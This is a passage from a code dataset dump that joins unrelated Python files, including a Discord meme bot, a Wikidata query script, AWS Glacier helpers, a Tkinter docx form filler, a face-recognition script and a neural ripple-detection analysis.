*lemons*! Do you know who I am? I'm the man who's going to *burn your house down! **With the lemons!*** I'm going to get my engineers to invent a combustible lemon that *burns your house down*!\",\n \"(`ー´)\",\n \"***ANGERY INTENSIFIES***\",\n \":angry: :angry: :angry: :angry:\",\n # ANGRY K INTENSIFIES\n \"😡 😡\\n😡 😡\\n😡 😡\\n😡 😡\\n😡😡\\n😡 😡\\n😡 😡\\n😡 😡\\n😡 😡\"\n ]\n\n @commands.command()\n async def spacing(self, spacing: int, *, message: str):\n \"\"\"Adds spacing to messages. Because why not, of course?\"\"\"\n if spacing > 50 or spacing < 1:\n message = \"Spacing must be between 1 and 50\"\n spacing = 1\n if len(message) > 500:\n message = \"🤔 That message is a bit too long.\"\n output = (\" \" * spacing).join(list(message))\n if len(output) > 1500:\n await self.bot.say((\" \" * 2).join(list(\"🤔 That message is a bit too long.\")))\n await self.bot.say(output)\n\n @commands.command(pass_context=True, aliases=[\"angery\"])\n async def angry(self, ctx, user: discord.Member=None, intensity: int=None):\n \"\"\"(`ー´)\"\"\"\n u = user\n if user is None:\n await self.bot.say(random.choice(self.angrymsgs))\n else:\n if intensity == 1 or intensity == None:\n await self.bot.say(\"**(;¬_¬)** \" + u.display_name)\n elif intensity == 2:\n await self.bot.say(\"**( ಠ ಠ )** \" + u.display_name)\n elif intensity == 3:\n await self.bot.say(\"**(」゜ロ゜)」** \" + u.display_name)\n elif intensity == 4:\n await self.bot.say(\"**( #`⌂´)/┌┛** \" + u.display_name)\n elif intensity in [5,6]:\n await self.bot.say(u.display_name + \" **щ(ºДºщ)**\")\n elif intensity in [7,8,9]:\n await self.bot.say(u.display_name + \" **Щ(ಠ益ಠЩ)**\")\n elif intensity >= 10:\n await self.bot.say(u.display_name + \" **Щ(◣д◢)Щ**\")\n\n @commands.command(pass_context=True)\n async def banana(self, ctx, user: discord.Member=None):\n \"\"\"It's like banning, but with bananas! And also harmless.\"\"\"\n if user is not None and user.id == self.bot.user.id:\n await self.bot.say(\"What did __I__ do to hurt you?\")\n return\n if user is None:\n await self.bot.say(\":banana: Somehow, {0} managed to slip on their own banana.\".format(ctx.message.author.display_name))\n else:\n if random.randint(0, 100) <= 95:\n await self.bot.say(\":banana: It appears that {0} managed to ban {1} with a *banana*, of all things. How they managed that, is well beyond me.\".format(ctx.message.author.display_name, user.display_name))\n else:\n await self.bot.say(\":banana: {0} tried to ban {1} with a banana, but seems to have failed whilst doing so, and accidentally slipped on it in the process. Good work, {0}.\".format(ctx.message.author.display_name, user.display_name))\n\ndef setup(bot):\n bot.add_cog(Memes(bot))\n","sub_path":"memes/memes.py","file_name":"memes.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"71766366","text":"import json\nfrom random import choice\nimport os\nfrom actions.Action import Action\n\nclass TalkAction(Action):\n name = \"Talk\"\n description = \"\"\"\n Just answers predefined phrases\n \"\"\".strip()\n\n def __read_phrases(self):\n phrases = os.path.join(os.path.dirname(os.path.abspath( __file__ )), 'phrases.json')\n with open(phrases) as handle:\n self.answers = json.load(handle)\n\n def __init__(self, settings={}):\n super().__init__(settings)\n self.__read_phrases()\n\n def update(self):\n self.__read_phrases()\n\n def execute(self, query, intent=None, data_collection={}):\n if intent in self.answers:\n return choice(self.answers[intent])\n else:\n return 'Doesn\\'t look like anything to me'\n\n\ndef main():\n action = TalkAction()\n print(action.execute('hello, world', 'hello'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"botkit/actions/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98306020","text":"from networking_utils.synchronous_network import SyncNetwork\nfrom networking_utils.message import Message\nimport unittest\n# from symbol import except_clause\n\nclass Test_Sync_Network(unittest.TestCase):\n def test_communication_round(self):\n \n # graph 0 - 1 - 2 - 3 - 0\n matrix1 = [[0, 1, 0, 1],\n [1, 0, 1, 0],\n [0, 1, 0, 1],\n [1, 0, 1, 0]]\n \n network = SyncNetwork(matrix1)\n \n # fill outbox of node 0 with messages to ALL other nodes\n for i in range(1, 4):\n msg = Message(0, i, {'':''})\n network.ndList[0].outbox.append(msg)\n \n network.communicationRound()\n \n # node 0's outbox should be empty\n self.failUnless(not network.ndList[0].outbox)\n \n # the only message in node 1 inbox should be adressed to node 1\n self.failUnless(network.ndList[1].inbox[0].iTargetID == 1)\n \n # ...etc.\n self.failUnless(network.ndList[2].inbox[0].iTargetID == 2)\n \n # ...etc.\n self.failUnless(network.ndList[3].inbox[0].iTargetID == 3)\n \n \nif __name__ == '__main__':\n unittest.main()","sub_path":"SDSS/src/tests/networking_utils/test_synchronous_network.py","file_name":"test_synchronous_network.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458894514","text":"'''\nLast Modified: March 22, 2021\nthis script is intended to create an import compliant csv file \nby querying data from wikidata.org\n'''\nimport pandas as pd\nimport json\nfrom collections import OrderedDict\nimport requests, csv, sys, re\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n print(\"Missing Parent QID\")\n QID = sys.argv[1]\n #query to wikidata and make a dataframe\n try:\n url = 'https://query.wikidata.org/sparql'\n query = (\"\"\"\n SELECT DISTINCT ?childLabel ?childDescription\n WHERE\n {\n wd:\"\"\" + QID + \"\"\" wdt:P527 ?parent. \n ?parent wdt:P527 ?child\n SERVICE wikibase:label { bd:serviceParam wikibase:language \"en\". }\n }\n order by asc(UCASE(str(?childLabel)))\n \"\"\")\n request = requests.get(url, params = {'format': 'json', 'query': query})\n data = request.json()\n except:\n print(\"cannot complete query\")\n leaves = []\n for item in data['results']['bindings']:\n leaves.append(OrderedDict({\n 'Label': item['childLabel']['value'],\n 'Description': item['childDescription']['value']}))\n df = pd.DataFrame(leaves)\n df.to_csv(\"leaves.csv\",index=False)\n\n\n","sub_path":"Python Scripts/leaves_pathway_prep.py","file_name":"leaves_pathway_prep.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"509301868","text":"import unittest\nfrom time_calculator import *\nfrom datetime import datetime, timedelta\nimport time\n\n\nclass UnitTests(unittest.TestCase):\n def test_get_time_from_str(self):\n time_str = \"3:30 PM\"\n actual = get_time_from_str(time_str)\n expected = datetime(1900, 1, 1, 15, 30)\n self.assertEqual(\n actual, expected,\n 'Expected calling \"get_time_from_str\" with \"3:30 PM\"')\n\n def test_get_hours_from_str(self):\n hours_str = \"1:30\"\n actual = get_hours_from_str(hours_str)\n expected = timedelta(hours=1.5)\n self.assertEqual(actual, expected)\n\n def test_calculate_time(self):\n base_time = datetime(1900, 1, 1, 15, 30)\n hours = timedelta(hours=1.5)\n actual = calculate_time(base_time, hours)\n expected = datetime(1900, 1, 1, 17, 00)\n self.assertEqual(actual, expected)\n","sub_path":"test_time_calculator.py","file_name":"test_time_calculator.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"433335095","text":"import sys\nimport os\nimport treehash\nimport time\nimport logging\nimport boto3\n\ndef monitor_job(glacier_client, vault_name, job_id, timeout):\n SLEEP = int(timeout)*60 # check every 20min if job is completed\n \n while True:\n response = glacier_client.list_jobs(\n vaultName = vault_name,\n #completed = 'true'\n )\n \n found = False\n completed = False\n \n for job in response['JobList']:\n #pp = pprint.PrettyPrinter(indent=4)\n #pp.pprint(job)\n if job['JobId'] == job_id:\n found = True\n completed = job['Completed']\n break\n \n if found and completed:\n if job.has_key('ArchiveSizeInBytes'):\n return int(job['ArchiveSizeInBytes'])\n else:\n return\n \n if found:\n end = time.localtime(time.time() + SLEEP)\n logging.info('Job is not completed yet, going back to sleep until %s' % time.strftime('%H:%M', end))\n time.sleep(SLEEP)\n else: \n logging.error('Job not found: %s' % job_id)\n sys.exit(2)\n\n\ndef sizeof_fmt(num, suffix='B'):\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\n\ndef delete_temp_file(filename):\n os.remove(filename)\n\n\ndef get_file_size(filename):\n return os.path.getsize(filename)\n\n\ndef get_tree_hash_of_file(filename):\n BUF_SIZE = 1024**2\n tree_hash = treehash.TreeHash() # default is SHA-256 and 1 MB\n \n with open(filename, 'rb') as f:\n while True:\n data = f.read(BUF_SIZE)\n if not data:\n break\n tree_hash.update(data)\n \n return tree_hash.hexdigest()\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9790124","text":"#!/usr/bin/env python\n\"\"\"Collection of functions for the manipulation of time series.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport warnings\n\nimport mando\nfrom mando.rst_text_formatter import RSTHelpFormatter\n\nfrom .. import tsutils\n\nwarnings.filterwarnings(\"ignore\")\n\n\n@mando.command(\"unstack\", formatter_class=RSTHelpFormatter, doctype=\"numpy\")\n@tsutils.doc(tsutils.docstrings)\ndef unstack_cli(\n column_names,\n input_ts=\"-\",\n columns=None,\n start_date=None,\n end_date=None,\n round_index=None,\n dropna=\"no\",\n skiprows=None,\n index_type=\"datetime\",\n names=None,\n source_units=None,\n target_units=None,\n clean=False,\n tablefmt=\"csv\",\n):\n \"\"\"Return the unstack of the input table.\n\n The unstack command takes the stacked table and converts to a\n standard tstoolbox table.\n\n From::\n\n Datetime,Columns,Values\n 2000-01-01,TS1,1.2\n 2000-01-02,TS1,1.8\n 2000-01-03,TS1,1.9\n 2000-01-01,TS2,1018.2\n 2000-01-02,TS2,1453.1\n 2000-01-03,TS2,1683.1\n 2000-01-01,TS3,0.0032\n 2000-01-02,TS3,0.0002\n 2000-01-03,TS3,-0.0004\n\n To::\n\n Datetime,TS1,TS2,TS3\n 2000-01-01,1.2,1018.2,0.0032\n 2000-01-02,1.8,1453.1,0.0002\n 2000-01-03,1.9,1683.1,-0.0004\n\n Parameters\n ----------\n column_names\n The column in the table that holds the column names\n of the unstacked data.\n {input_ts}\n {columns}\n {start_date}\n {end_date}\n {dropna}\n {skiprows}\n {index_type}\n {names}\n {clean}\n {source_units}\n {target_units}\n {round_index}\n {tablefmt}\n\n \"\"\"\n tsutils.printiso(\n unstack(\n column_names,\n input_ts=input_ts,\n columns=columns,\n start_date=start_date,\n end_date=end_date,\n round_index=round_index,\n dropna=dropna,\n skiprows=skiprows,\n index_type=index_type,\n names=names,\n source_units=source_units,\n target_units=target_units,\n clean=clean,\n ),\n tablefmt=tablefmt,\n )\n\n\ndef unstack(\n column_names,\n input_ts=\"-\",\n columns=None,\n start_date=None,\n end_date=None,\n round_index=None,\n dropna=\"no\",\n skiprows=None,\n index_type=\"datetime\",\n names=None,\n source_units=None,\n target_units=None,\n clean=False,\n):\n \"\"\"Return the unstack of the input table.\"\"\"\n tsd = tsutils.common_kwds(\n tsutils.read_iso_ts(\n input_ts, skiprows=skiprows, names=names, index_type=index_type\n ),\n pick=columns,\n bestfreq=False,\n )\n\n try:\n newtsd = tsd.pivot_table(\n index=tsd.index,\n values=tsd.columns.drop(column_names),\n columns=column_names,\n aggfunc=\"first\",\n )\n except ValueError:\n raise ValueError(\n tsutils.error_wrapper(\n \"\"\"\nDuplicate index (time stamp and '{0}') where found.\nFound these duplicate indices:\n{1}\n\"\"\".format(\n column_names, tsd.index.get_duplicates()\n )\n )\n )\n\n newtsd.index.name = \"Datetime\"\n\n newtsd.columns = [\n \"_\".join(tuple(map(str, col))).rstrip(\"_\") for col in newtsd.columns.values\n ]\n\n # Remove weird characters from column names\n newtsd.rename(columns=lambda x: \"\".join([i for i in str(x) if i not in \"'\\\" \"]))\n\n newtsd = tsutils.common_kwds(\n newtsd,\n start_date=start_date,\n end_date=end_date,\n dropna=dropna,\n clean=clean,\n source_units=source_units,\n target_units=target_units,\n round_index=round_index,\n )\n\n return newtsd\n\n\nunstack.__doc__ = unstack_cli.__doc__\n","sub_path":"tstoolbox/functions/unstack.py","file_name":"unstack.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57703117","text":"# Copyright Jay Conrod. All rights reserved.\n\n# This file is part of rules_go_simple. Use of this source code is governed by\n# the 3-clause BSD license that can be found in the LICENSE.txt file.\n\n# def.bzl contains public definitions that may be used by Bazel projects for\n# building Go programs. These definitions should be loaded from here and\n# not any internal directory.\n\nload(\n \"//v2/internal:rules.bzl\",\n _go_binary = \"go_binary\",\n _go_library = \"go_library\",\n)\nload(\n \"//v2/internal:providers.bzl\",\n _GoLibrary = \"GoLibrary\",\n)\n\ngo_binary = _go_binary\ngo_library = _go_library\nGoLibrary = _GoLibrary\n","sub_path":"v2/def.bzl","file_name":"def.bzl","file_ext":"bzl","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462424825","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom docxtpl import DocxTemplate, InlineImage\nfrom tkinter import filedialog\nimport widgets as formEntries\nimport tkinter.ttk as ttk\n\nclass formWindow(tk.Tk):\n #a dictionary of all the widgets and there objects\n #using a lambda function to call the creation of the objects\n widgetObjects = { \\\n \"menuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.menuEnt(self,nameVal,name,widgetId,sort),\\\n \"entry\" : lambda self,nameVal,name,widgetId,sort : formEntries.entryEnt(self,nameVal,name,widgetId,sort),\\\n \"mediMenu\" : lambda self,nameVal,name,widgetId,sort : formEntries.medicMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"ageSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.ageSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"ecgMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.ecgMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"flowButtonEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.flowButtonEnt(self,nameVal,name,widgetId,sort),\\\n \"checkUpSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.checkUpSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"nameAitEntryEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.nameAitEntryEnt(self,nameVal,name,widgetId,sort),\\\n \"bodyWeightSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.bodyWeightSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"dogDMVDCardiologicalAnalysisEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.dogDMVDCardiologicalAnalysisListBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"weightSpinBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.weightSpinBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"pdfReader\" : lambda self,nameVal,name,widgetId,sort : formEntries.pdfReader(self,nameVal,name,widgetId,sort),\\\n \"auditoryFindingsMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.auditoryFindingsMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"RECardiologicalAnalysisListBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.dogDMVDRECardiologicalAnalysisListBoxEnt(self,nameVal,name,widgetId,sort),\\\n \"photoReader\" : lambda self,nameVal,name,widgetId,sort : formEntries.photoReader(self,nameVal,name,widgetId,sort),\\\n \"historyMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.historyMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"breedMenuEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.breedMenuEnt(self,nameVal,name,widgetId,sort),\\\n \"catHCMRECardiologicalAnalysisListBoxEnt\" : lambda self,nameVal,name,widgetId,sort : formEntries.catKfCardiologicalAnalysisListBoxEnt(self,nameVal,name,widgetId,sort)\\\n }\n def __del__(self):\n print(\"Ending formsWindow\")\n tempKeyList = list()\n\n\n print(self.entries)\n\n\n def __init__(self,master):\n #reference to window class as master\n self.master = master\n #reference to the id of the file -> form that has been selected to be filled\n self.fileId = self.master.fileSelected[0]\n #reference to the name of the file -> form that has been selected to be filled\n self.name = self.master.fileSelected[1]\n #reference to the language of the file -> form that has been selected to be filled\n self.language = self.master.fileSelected[2]\n #reference to the animal of the file -> form that has been selected to be filled\n self.pet = self.master.fileSelected[3]\n #reference to the file name(*.docx) of the file -> form that has been selected to be filled\n self.fileName = self.master.fileSelected[4]\n #reference to all the input widgets creted for this form\n self.entries = {}\n #a new frame inside the window class\n self.mainFrame = tk.Frame(self.master.window)\n #fill the mainFrame with the widgets for the file fileSelected\n self.createInputFrame()\n\n\n self.mainFrame.pack(fill = \"both\", expand = True)\n\n\n #open a list with widgets and constuct all them all\n def createInputFrame(self):\n #create a canvas to inside the mainFrame\n self.canvas = tk.Canvas(self.mainFrame)\n #create a frame inside the canvas\n self.inputFrame = tk.Frame(self.canvas, background = \"bisque\" )\n #call getForm(fileId) to get all the widgets specified for this file\n self.form = self.master.getForm(self.fileId)\n #for evety widget in the list create the object specified in the dictionary\n for widget in self.form:\n #\n obj,name,nameVal,sort = self.master.getWidget(widget)\n self.entries[name] = self.widgetObjects[obj](self,nameVal,name,widget,sort)\n\n self.inputFrame.pack()\n self.createButtonFrame()\n self.createScrollbar()\n\n #create a frame with utility buttons\n def createButtonFrame(self):\n #create a frame\n self.buttonFrame = tk.Frame(self.mainFrame)\n #create a label with the file's info (name language pet)\n self.fileSelectedLabel = tk.Label(self.buttonFrame, text = self.fileName + \"\\n\" + self.language + \"\\n\" + self.pet )\n self.fileSelectedLabel.pack(anchor = \"n\")\n #create a button to enter the informaton filled in the widgets\n self.enterData = tk.Button(self.buttonFrame, text = \"Enter Data\", command = self.enterdata)\n self.enterData.pack(anchor = \"center\")\n #create a button to clear the information filled in the widgets\n self.clearButton = tk.Button(self.buttonFrame, text = \"Clear Form\", command = self.clearForm)\n self.clearButton.pack(anchor = \"center\")\n #create a button to get back to the fileSelectionWindow\n self.quitButton = tk.Button(self.buttonFrame, text=\"Back to form selection\", command = self.quit)\n self.quitButton.pack(anchor = \"s\")\n\n self.buttonFrame.pack(side='right', fill = \"y\")\n #create a scroll bar inside the canvas and bind it to the mouse wheel\n def createScrollbar(self):\n self.canvas.update_idletasks()\n self.canvas.create_window(0, 0, anchor='nw', window=self.inputFrame)\n\n self.scrollBar = tk.Scrollbar(self.canvas, orient=\"vertical\", command=self.canvas.yview)\n self.scrollBar.pack(fill='y', side='right')\n\n self.canvas.configure(scrollregion=self.canvas.bbox('all'),yscrollcommand=self.scrollBar.set)\n #update the scrollbar place\n self.updateScrollBar()\n\n self.canvas.pack(fill='both', expand=True, side='left')\n\n self.canvas.bind_all(\"\", self.onMouseWheel)\n #update the scrollbar view\n def updateScrollBar(self):\n self.canvas.configure(scrollregion=self.canvas.bbox('all'),yscrollcommand=self.scrollBar.set)\n #every mouse wheel bind for events\n def onMouseWheel(self, event):\n scrollDir = int(event.delta/120)\n self.canvas.yview('scroll',-1*scrollDir, \"units\")\n self.updateScrollBar()\n\n\n def clearForm(self):\n answer = messagebox.askyesno('You do not appreciate the work that your slave has done so far','Do you need slave to clear the board and start all over?')\n if answer:\n self.clearWidgets()\n\n def quit(self):\n answer = messagebox.askyesno('You need to your slave to hand an other task','Do you need slave to get you bask to the form selection window?')\n if answer:\n self.goBack()\n\n #to clear the widgets the canvas and the buttonFrame are destoyed and re-created\n def clearWidgets(self):\n self.canvas.destroy()\n self.buttonFrame.destroy()\n self.createInputFrame()\n\n #to get back to the fileSelectionWindow the fileSelected paremeter is equal to None\n #the mainFrame with the widgets is destroyed\n #and the function checkState is being called\n def goBack(self):\n self.master.fileSelected = None\n self.master.window.destroy()\n self.master.checkState()\n\n #a fuction to collect all the data from the widgets and create the docx file\n def enterdata(self):\n #get the string file path and name\n filePath = self.master.path+\"\\\\Protipa\\\\\" + self.fileName\n #make a DocxTemplate object\n doc = DocxTemplate(filePath)\n context = {}\n #make a loading bar into the buttonFrame\n self.loadingBar = ttk.Progressbar(self.buttonFrame, orient = \"horizontal\", length = 100, mode = 'determinate')\n self.loadingBar.pack(anchor = \"s\")\n #divide the progress bar into equal piecies, depending on the on many widget have been made\n loadingBarValue = 100/len(self.entries)\n #for every widget in the entries dictionary\n for ent in self.entries:\n #call the getWidgetValues function and store it in input\n input = self.entries[ent].getWidgetValues()\n #call the loadingBarProgress\n self.loadingBarProgress(loadingBarValue)\n\n if input == None :\n pass\n #if the there has been any change in the widgets\n else:\n #check in the input comes from the photo widget, in order to create an inlineinage object\n temp = []\n if ent == \"PHOTOS\":\n for image in input:\n myImage = InlineImage(doc, image )\n temp.append(myImage)\n else:\n temp = input\n #append the data from the input to the context dictionary\n context[ent] = temp\n\n #render the context dictionary\n doc.render(context)\n print(context)\n #clear the filePath paremeter\n filePath = \"\"\n #make a string of the path for the new to be saved at\n filePath = filedialog.asksaveasfilename(title = \"Select file\",filetypes = [(\"docx files\",\"*.docx\")])\n if filePath == \"\":\n #if the path is empty destroy the loading bar\n self.loadingBar.destroy()\n else:\n #add the .docx to the file\n filePath += \".docx\"\n #save the file\n doc.save(filePath)\n #give the chose to go back to fileSelectionWindow or clear the widget at the forms window\n answer = messagebox.askyesno('Make slave keep working on this form','Whip slave and make him go back to work?')\n if answer:\n self.clearWidgets()\n else:\n self.goBack()\n\n def calcWeight(self,weight):\n indexes = self.master.getPetWeightIndex(self.pet)\n if weight <= indexes[0]:\n return \"small\"\n elif weight <= indexes[1]:\n return \"average\"\n else:\n return \"tooMuch\"\n\n def calcAge(self,age):\n indexes = self.master.getPetAgeIndex(self.pet)\n if age < indexes[0]:\n return \"young\"\n elif age < indexes[1]:\n return \"adult\"\n else:\n return \"elder\"\n\n def loadingBarProgress(self,val):\n self.loadingBar['value'] = self.loadingBar['value'] + val\n self.buttonFrame.update_idletasks()\n","sub_path":"formsWindow.py","file_name":"formsWindow.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"208122804","text":"from collections import deque\nfrom collections import defaultdict\nclass Solution(object):\n\tdef getCmp(self, word1, word2, cmps):\n\t\t\"\"\"\n\t\t:return FALSE when error \n\t\t:type word1: str\n\t\t:type word2: str\n\t\t:type cmps: set\n\t\t:rtype: boolean\n\t\t\"\"\"\n\t\tfor i, c1 in enumerate(word1): #这个函数不会检测“xy 和yx”情况,因为最后一行做了\n\t\t\tif i >= len(word2): #\"xyc 和 xy 这种提供不了任何信息\"\n\t\t\t\treturn False\n\t\t\tif c1 != word2[i]:\n\t\t\t\tcmps.add((c1, word2[i]))\n\t\t\t\tbreak\n\t\treturn True\n\t\t\n\t\n\tdef alienOrder(self, words):\n\t\t\"\"\"\n\t\t:type words: List[str]\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tcmps = set()\n\t\tallChars = set()\n\t\tfor i, word1 in enumerate(words):\n\t\t\tfor c in word1:\n\t\t\t\tallChars.add(c) #把所有的char都放进去\n\t\t\tfor word2 in words[i + 1:]:\n\t\t\t\tif not self.getCmp(word1, word2, cmps):\n\t\t\t\t\treturn \"\"\n\t\treturn \"\".join(self.tpsort(cmps, allChars))\n\t\t\n\tdef tpsort(self, cmps, allChars):\n\t\t\"\"\"\n\t\t:type words: set[(char, char)]\n\t\t:rtype: list[char]\n\t\t\"\"\"\n\t\tdpenedMap = defaultdict(set)\n\t\tdpenNums = defaultdict(int)\n\t\tfor cmp in cmps:\n\t\t\tdpenedMap[cmp[0]].add(cmp[1])\n\t\t\tif cmp[0] != cmp[1]:\n\t\t\t\tdpenNums[cmp[1]] += 1\n\t\tq = []\n\t\tfor char in allChars:\n\t\t\tif dpenNums[char] == 0:\n\t\t\t\tq.append(char)\n\t\tindex = 0\n\t\twhile index < len(q):#BFS模板,保留q,所以用idx代替pop\n\t\t\tcur = q[index]\n\t\t\tindex += 1\n\t\t\tfor dpen in dpenedMap[cur]:\n\t\t\t\tdpenNums[dpen] -= 1\n\t\t\t\tif dpenNums[dpen] == 0:\n\t\t\t\t\tq.append(dpen)\n\t\treturn q if len(allChars) == len(q) else [] #防止死锁\n\t\t\t\n\t\t\n\t\t\n\n","sub_path":"shuhan/facebook/shuhan/hard/LC269. Alien Dictionary.py","file_name":"LC269. Alien Dictionary.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362230376","text":"import cv2\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nimport os\ncap = cv2.VideoCapture(0)\nclassifier = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nmodel = KNeighborsClassifier()\ndata = np.load('faces.npy')\nX,Y = data[:,1:].astype(np.int),data[:,0]\nmodel.fit(X,Y)\nwhile True:\n ret, frame = cap.read()\n if ret:\n face = classifier.detectMultiScale(frame)\n if len(face) > 0:\n np_face = np.array(face)\n best_face = np.product(np_face[:, 2:], axis=1).argmax()\n x, y, w, h = face[best_face]\n crop = frame[y:y + h, x:x + w]\n face_img = cv2.resize(crop, (100, 100))\n face_gray = cv2.cvtColor(face_img,cv2.COLOR_RGB2BGR)\n face_flat = face_gray.flatten()\n fin_face = model.predict([face_flat])\n image = cv2.putText(frame,fin_face[0],(x, y), cv2.FONT_HERSHEY_SIMPLEX,fontScale= 3,color= (255, 0, 0),thickness= 4)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 5)\n cv2.imshow('Main video', frame)\n\n key = cv2.waitKey(1)\n if ord('q') == key:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"359916336","text":"import numpy as np\nimport pandas as pd\nimport neuroseries as nts\nfrom pylab import *\nfrom wrappers import *\nfrom functions import *\nimport sys\n\n\ndata_directory = '/mnt/DataGuillaume/LMN/A1407/A1407-190416'\n\n\nepisodes = ['sleep', 'wake', 'sleep']\n\nevents = ['1']\n\n\n\nspikes, shank \t\t\t\t\t\t= loadSpikeData(data_directory)\nn_channels, fs, shank_to_channel \t= loadXML(data_directory)\nposition \t\t\t\t\t\t\t= loadPosition(data_directory, events, episodes)\nwake_ep \t\t\t\t\t\t\t= loadEpoch(data_directory, 'wake', episodes)\nsleep_ep \t\t\t\t\t\t\t= loadEpoch(data_directory, 'sleep')\t\t\t\t\t\nacceleration\t\t\t\t\t\t= loadAuxiliary(data_directory)\n\nsws_ep\t\t\t\t\t\t\t\t= loadEpoch(data_directory, 'sws')\n\n# tuning_curves \t\t\t\t\t\t= computeAngularTuningCurves(spikes, position['ry'], wake_ep, 60)\ntuning_curves, velocity, edges \t\t= computeLMNAngularTuningCurves(spikes, position['ry'], wake_ep, 61)\nspatial_curves, extent\t\t\t\t= computePlaceFields(spikes, position[['x', 'z']], wake_ep, 20)\nautocorr_wake, frate_wake \t\t\t= compute_AutoCorrs(spikes, wake_ep)\nautocorr_sleep, frate_sleep \t\t= compute_AutoCorrs(spikes, sleep_ep)\nvelo_curves \t\t\t\t\t\t= computeAngularVelocityTuningCurves(spikes, position['ry'], wake_ep, nb_bins = 30, norm=False)\n# sys.exit()\n# mean_frate \t\t\t\t\t\t\t= computeMeanFiringRate(spikes, [wake_ep, sleep_ep], ['wake', 'sleep'])\nspeed_curves \t\t\t\t\t\t= computeSpeedTuningCurves(spikes, position[['x', 'z']], wake_ep)\n\n# downsampleDatFile(data_directory)\n\nfor i in tuning_curves:\n\ttuning_curves[i] = smoothAngularTuningCurves(tuning_curves[i], 10, 2)\n\nvelo_curves = velo_curves.rolling(window=5, win_type='gaussian', center= True, min_periods=1).mean(std = 1.0)\nspeed_curves = speed_curves.rolling(window=5, win_type='gaussian', center= True, min_periods=1).mean(std = 1.0)\n\t\t\n\nlfp \t\t= loadLFP(os.path.join(data_directory,data_directory.split('/')[-1]+'.eeg'), n_channels, 22, 1250, 'int16')\n\nfrequency = 1250.0\nlow_cut = 100\nhigh_cut = 300\nwindowLength = 51\nlow_thresFactor = 1\nhigh_thresFactor = 5\nminRipLen = 20 # ms\nmaxRipLen = 200 # ms\nminInterRippleInterval = 20 # ms\nlimit_peak = 20\n\n\nsignal = butter_bandpass_filter(lfp.values, low_cut, high_cut, frequency, order = 4)\n\nsquared_signal = np.square(signal)\n\nwindow = np.ones(windowLength)/windowLength\n\nnSS = scipy.signal.filtfilt(window, 1, squared_signal)\n\n# Removing point above 100000\nnSS = pd.Series(index = lfp.index.values, data = nSS)\nnSS = nSS[nSS<200000]\n\nnSS = (nSS - np.mean(nSS))/np.std(nSS)\n\nsignal = pd.Series(index = lfp.index.values, data = signal)\n\n\n\nfigure()\nax = subplot(211)\nplot(nSS)\naxvline(3199825000)\nsubplot(212,sharex = ax)\nplot(lfp)\nshow()\n\n\n######################################################l##################################\n# Round1 : Detecting Ripple Periods by thresholding normalized signal\nthresholded = np.where(nSS > low_thresFactor, 1,0)\nstart = np.where(np.diff(thresholded) > 0)[0]\nstop = np.where(np.diff(thresholded) < 0)[0]\nif len(stop) == len(start)-1:\n\tstart = start[0:]\nif len(stop)-1 == len(start):\n\tstop = stop[1:]\n\n\n\n################################################################################################\n# Round 2 : 